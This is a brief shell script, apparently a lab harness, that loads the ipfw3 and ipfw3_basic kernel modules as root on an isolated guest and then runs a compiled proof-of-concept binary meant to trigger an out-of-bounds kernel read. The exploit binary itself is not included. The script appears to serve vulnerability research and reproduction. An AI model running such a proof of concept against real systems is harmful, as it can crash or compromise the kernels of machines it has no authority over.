#!/bin/sh
# DF-0670 run helper — runs as root on the guest.
# Loads ipfw3 + ipfw3_basic (networking severed), then triggers the OOB read.
set +e
cd "$(dirname "$0")"
KLDLOAD=/sbin/kldload
echo "[+] loading ipfw3 modules"
$KLDLOAD ipfw3
$KLDLOAD ipfw3_basic
echo "[+] running PoC (short-buffer CREATE then LIST)"
./df0670_ipfw3_oob
echo "PoC_EXIT=$?"
